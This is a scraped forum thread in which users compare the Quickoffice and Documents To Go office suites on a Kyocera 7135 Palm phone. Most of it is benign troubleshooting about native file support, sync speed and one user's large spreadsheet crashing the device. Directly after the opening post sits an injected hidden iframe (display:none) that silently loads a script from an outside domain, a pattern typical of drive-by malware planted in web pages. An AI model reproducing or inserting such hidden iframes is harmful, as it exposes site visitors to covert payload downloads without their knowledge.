+ Reply to Thread
Page 1 of 2 1 2 LastLast

Quick Office vs Docs to Go

Anyone have a preference as to which is better? I am most concerned with being able to read email attachments, so does anyone know if both will syncronize with Workstyle (I know Docs to Go will, as long as you don't use the latest version, I was wondering about Quick Office)?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Quick office premier opens native DOC and XLS Office files. So to me, QO wins hands down.

My understanding is that QuickOffice has the better features and functionality -- and can open Word and Excel files in their native formats -- but that the program is relatively resource intensive. In other words, it is very SLOOOOW.

But don't let me discourage you. Despite what I have heard (and the nasty rumors I am perpetuating in this post), I plan to get QuickOffice for my 7135. That is, as soon as I get my Kyocera 7135.

Verizon, can you hear me now???:anger

I've used both and think Quick Office wins out because it opens native Doc files. While it may be slower than Docs to Go in its native format, I don't find the speed an issue at all.

Originally posted by Lnoble
    I've used both and think Quick Office wins out because it opens native Doc files. While it may be slower than Docs to Go in its native format, I don't find the speed an issue at all.
    Same here..... some of the bigger native files take some time to open, but not very long.
    Please visit my picture site: Robert-O-Rama :)

I downloaded quickoffice trial and used for about a week, but decided to buy docs-to-go. I use powerpoint much more than anything else, and had decided to use quick office because it allows you to edit powerpoint slides on the pda, and using Pitch Solo from igo you can connect to a projector through the usb cable (docs-to-go uses Margi which connects through the expansion slot).

But after playing with quickpoint quite a bit, I could not stand the slow speed which it loaded the slides. Docs-to-go zips right though the slides. I'm not sure why quickoffice is so slow, but it killed the deal for them even though they have some nicer features.

March 25 Amendment - I just received the Margi projector connector and am quite dissapointed. The Presenter-to-go software that comes with Margi shows the powerpoint beautifully, but does not allow for editing on the palm. You can view Docs-to-go files (for that matter anything showing up on your palm - all apps), but they are at very low resolution. The only way to convert to the Margi format is on the desktop. Also, the presenter-to-go takes several seconds to load the next slide. At this point I'm wishing I had gotten Quickoffice and igo.
    If at first you don't succeed, don't try sky diving.

I decided on DocToGo because of their wireless syncing program called InBoxToGo. It basically converts doc, xls files on the fly when syncing remotely.

Some please advise if QuickOffice can do this

Originally posted by pdageek
    I decided on DocToGo because of their wireless syncing program called InBoxToGo. It basically converts doc, xls files on the fly when syncing remotely.

Some please advise if QuickOffice can do this
    I'm not sure exactly what you are asking, but with QuickOffice there is no "conversion" necessary, because it supports Office files in their native format (although changes made are not sync'd). QO does also support syncronization of files when using the QuickOffice Desktop app, which converts the files to a .pdb format.

The decision as to which to buy may be made easier, as my undertsanding is that the phone will come bundled with Quick Office, at least when it is released by Verizon Wireless...

When I receive emails with attachments on the road I can view, edit and respond with changes that appear in their native format to the person I respond to.

The ability for QuickOffice to read native files off of a SD card is cool but if you're going to take the time to save a file to your SD card you might as well sync it using the desktop program.

I'm unclear on why QuickOffice won't sync changes as DocToGo does.

p.s. I just got an email from QuickOffice promoting the new version as I was a previous QO Pro user. Am I missing something here?

Re: Quick Office vs Docs to Go

Originally posted by RMSko
    Anyone have a preference as to which is better? I am most concerned with being able to read email attachments, so does anyone know if both will syncronize with Workstyle (I know Docs to Go will, as long as you don't use the latest version, I was wondering about Quick Office)?
    I have also been trying to figure out which of these two to buy, I know that Quick Office can edit native Office files, but Docs to Go can open PDF files, so I am undecided at this point.

File won't load

I use one excel workbook, that has 6 worksheets in it.
    Initially I loaded the Quickoffice app off the Verizon CD, but before using it, discovered the Premiere version which has better features. So, I just purchased the Premier version and installed it.

Now, I can't get it to open my workbook. I have spent all day today reading manuals, FAQs, and website...don't know what I am doing wrong. I have never used a Palm before so am unfamiliar with categories and moving stuff around-maybe I am not understanding the directions. I followed the directions in the PDF tutorial and saved the open file using the Quicksheet menu. It mentions in the tutorial that cells should number 2500 or less. My workbook has well over that number of cells (but many are blank). But the Premiere website says it can accomodate multiple worksheets- "Supports multiple sheets per workbook and allows you to link the sheets -
    Large 996 rows x 254 columns per sheet " Four of the worksheets have 29 columns and 150 rows.

It took over 5 minutes to save the file to the Quickoffice desktop - and then I did a hot sync. My Palm went thru a hotsync and took FOREVER to close. When it finally made the little noise that hotsync ended, it said it was unable to complete the hotsync action.

I have very little loaded into the internal memory and have a 256MB memory card. My workbook file is 296KB. Is it impossible to run a file this large using Quickoffice? Would Docs to Go be a better choice?

Thanks for any help - some of the contributors here seem to have a lot of experience with this program and I am hoping you can offer some assistance. You can also PM me if that would better than a long post.

Cindy

Edit: I just tried adding my file from within the Quickoffice desktop. After it loaded my file into the window, the file size changed from 296 KB to 2296KB - what's going on???? That is huge!
    Love my 7135!

Re: File won't load

Originally posted by TerpCJ
    It took over 5 minutes to save the file to the Quickoffice desktop - and then I did a hot sync. My Palm went thru a hotsync and took FOREVER to close. When it finally made the little noise that hotsync ended, it said it was unable to complete the hotsync action.

I have very little loaded into the internal memory and have a 256MB memory card. My workbook file is 296KB. Is it impossible to run a file this large using Quickoffice? Would Docs to Go be a better choice?

Thanks for any help - some of the contributors here seem to have a lot of experience with this program and I am hoping you can offer some assistance. You can also PM me if that would better than a long post.

Cindy

Edit: I just tried adding my file from within the Quickoffice desktop. After it loaded my file into the window, the file size changed from 296 KB to 2296KB - what's going on???? That is huge!
    Cindy... have you tried loading that file directly onto your SD card in it's native Excel format, and opening it in Quicksheet that way? (not that you should have to... but that's one of the big benefits of Premier).

When you said "Edit: I just tried adding my file from within the Quickoffice desktop. After it loaded my file into the window, the file size changed from 296 KB to 2296KB - what's going on???? That is huge!".... how had you been trying to get the file onto your 7135 before, if not within Quickoffice desktop? It sounds like the file size change is related to the fact that once the QuickOffice desktop converts the .xls into a .pdb, the file size of the .pdb is a lot smaller than it was before. But you can also open a .pdb formatted file from within the Quickoffice desktop and it will convert back to its native format, which increases the size again. I guess I'm a bit confused as to what you were seeing, and when and where you were seeing it

Hi Robert - I'll try to explain myself better this time:

There seems to be 3 ways to get an excel file into the PDA, and I have tried all 3 of them.
    My file, in native format, is 296KB when I view it in Windows Explorer.

1. Open the native file in Excel. Go to the Menu Bar and click on Quicksheet, Save As. A dialog box opens and says, "wrkbk has large # of cells (84317) do u want to continue". I click YES to save, and it opens up the Save Quicksheet Workbook box. You enter a name for the file and click save and it eventually puts the opened file in the Quicksheet box/window but the size is now 2296KB...(It gets Larger going from native to Quicksheet).

2. Don't open up the Excel native file. Just open the Quickoffice Desktop and click on File, Add File, then find the native file and open it. That has the same result as step one above. After going thru each Worksheet in the Workbook, the file name appears in the Quicksheet window and the size is now 2296KB.

3. Drag the native excel file to the SD card, via a card reader. Problem here is I didn't know what kind of file hierarchy to follow. I tried to access it off the SD card, but it started searching and then froze up. I had to do a soft reset.

Do I put it in root/ or in a Sub-directory. Am I supposed to create a new dir called Quickoffice or what? If you can give me the file structure on your SD card - great! My problem is I have never before used a Palm device and I don't know how things are structured. I have been doing some surfing trying to find sites that teach "palm 101" but if someone could give me specific advice for this software it would be a relief.

So, in your opinion Robert, this file size is not asking too much of Quickoffice?

Thanks!
    Cindy

Robert wrote:
    Cindy... have you tried loading that file directly onto your SD card in it's native Excel format, and opening it in Quicksheet that way? (not that you should have to... but that's one of the big benefits of Premier).

When you said "Edit: I just tried adding my file from within the Quickoffice desktop. After it loaded my file into the window, the file size changed from 296 KB to 2296KB - what's going on???? That is huge!".... how had you been trying to get the file onto your 7135 before, if not within Quickoffice desktop? It sounds like the file size change is related to the fact that once the QuickOffice desktop converts the .xls into a .pdb, the file size of the .pdb is a lot smaller than it was before. But you can also open a .pdb formatted file from within the Quickoffice desktop and it will convert back to its native format, which increases the size again. I guess I'm a bit confused as to what you were seeing, and when and where you were seeing it
    Love my 7135!

Still in the valley of indecision, so I thought I'd share the following to throw a little fuel on the fire.

http://www.eweek.com/article2/0,3959,1036165,00.asp

The most interesting part is the fourth paragraph:

"The main rival to Quickoffice in this space, DataViz Inc.'s Documents to Go, is supposed to gain this capability [the ability for Palm OS users to access and edit Microsoft Word, Excel and PowerPoint files in their native formats] this summer."

Can anyone provide confirmation and/or more details?

Cindy: I've had a very similar experience. First off, a question: What version of QO Desktop software are you using? Just checking that you have a version 7 desktop. (You probably do-- just want to make sure, because both the demo and the Premiere install have conduits.)

My experience: When I loaded a file from the conduit, I was unable to open it on the Palm-- I was getting the not-so-helpful error, "Not enough free memory. 6 required." :eyesroll I saw three different sizes for this file: On the PC itself, the file was 73 KB. (Windows reported 128 KB used on disk.) When I loaded it into QuickOffice Desktop, the size grew to 688 KB.... And when I synced the file onto the Palm, the size grew to 1169 KB!

I think, as Robert was saying, that using the conduit causes QO to convert the file out of native Excel format. This causes size weirdness, and maybe stresses the little system out.

One route which worked for me was to email the file to mself from my PC, open the attachment into QO using Snapper, and then save the file on the Palm. This put it in internal memory, of course, but you could then move it to the card.

In addition, I've also written the file directly to the SD card using a Cruzer. You'll need to place it in the following directory: PALMProgramsQuickoffice When you go to open it, then, in QS, you'll need to click both buttons at the bottom right of the screen: The first one in, which lets you pick native format files to browse, and the second one in, which lets you pick card vs. internal.

Let us know if this works.

Thanks!

Hi Turbocat:
    Yes, I am using Premier version 7. I got the Snappermail demo but haven't run it yet....it was included in the Quickoffice Premier download. I don't want to try that until I get the Excel file working. (easier to troubleshoot one thing at a time)

So, the only way I guess I can get this file onto my 7135 is via the SD card reader. (I have the Lexar Jumpdrive trio) I am working on tweaks to my Excel file first, and will try your solution later this afternoon.

I'll also need to check out the Quickoffice documentation to see if they have an explanation of the icons used in their program.

I'll post later and let u know if I am successful. I was able to get a 2 page MS Word file to load, and the file size became smaller after it arrived on the Palm. I used the Quickoffice desktop (conduit?) to transfer it over. Maybe if I make a practice spreadsheet that is tiny - I can use that to learn the ropes.

It would be super if this one workbook could be accessed on my 7135. I just don't know if the large size is going to axe it.

Cindy
    Love my 7135!

Crashed my unit

Well, just experienced my first hard reset since I got the phone...caused by Quicksheet.

I tried the SD card first...chopped my spreadsheet down to 1 worksheet and saved it in Excel format with a new name. 64Mb was the size listed in Explorer.

Checked the file structure on the SD card using the card reader and the correct subdirectories were already there.

Dragged and dropped the 64MB file to the card and dropped it in the Quickoffice dir.

After inserting the card, opened up Quicksheet, selected the card and then the native file, excel logo. Palm dialog came up "scanning the memory card" and I let it go and go. After 10 minutes came to the conclusion that it had frozen and did a soft reset.

Decided to try the Quickoffice desktop one more time. Clicked on File, Add File and browsed to the location of the small Excel file. Selected it and said YES to linking it. It transferred it into the "window" in less than 2 min. and I did a hotsync. This time it was successful and it finished hot syncing.

I was able to tap on Quicksheet in the Palm and actually open up the file and move around in it. Worked fine-size had increased to 173Kb. Closed the program and decided to delete the file off the PDA and try loading a larger one. Tapped back on Quicksheet, saw the file name and tapped it once, then Options - Delete file.

BANG! the 7135 went black. Soft reset didn't work. Had to remove the battery and do a hard reset. I think I am done experimenting with Quickoffice.

I just don't have the knowledge base with the Palm OS to feel comfortable figuring this out. I don't want to blame the software - others have used it with no problems - but I think I am biting off more than I can chew right now.

Cindy
    Love my 7135!

Cindy,

Ouch! Sorry to hear that QO gave you that kind of trouble! It's a frustrating situation, because there are many folks here who have either immediately or eventually (in my case) had it work right, and there are a few for whom it has caused an issue. If the functionality is something you can live without for a while, and you're not feeling like messing with it, I think waiting for the next release (presuming they're able to re-create some of these problems, and figure out what's causing them) is a very sound plan.

Enjoy the rest of your 7135!

Originally posted by turboCat
    Cindy,

Ouch! Sorry to hear that QO gave you that kind of trouble!
    Same here. I use Quickoffice pretty frequently with no problems... but maybe I haven't done anything that pushes it beyond it's limits. But some of the things you have tried to do are things that I have had no trouble with. I use almost exclusively natively formatted files now, since size isn't really an issue on the SD card, and the scanning process has always been smooth. As a matter of fact, you don't even have to store the files in the Quickoffice folder on the card... it will find them regardless of the location.

Have you contacted CES, Inc's technical support? They are very helpful, and seem very knowledgeable. The number to call is 214.956.9806 x2. You should give them a shout before giving up!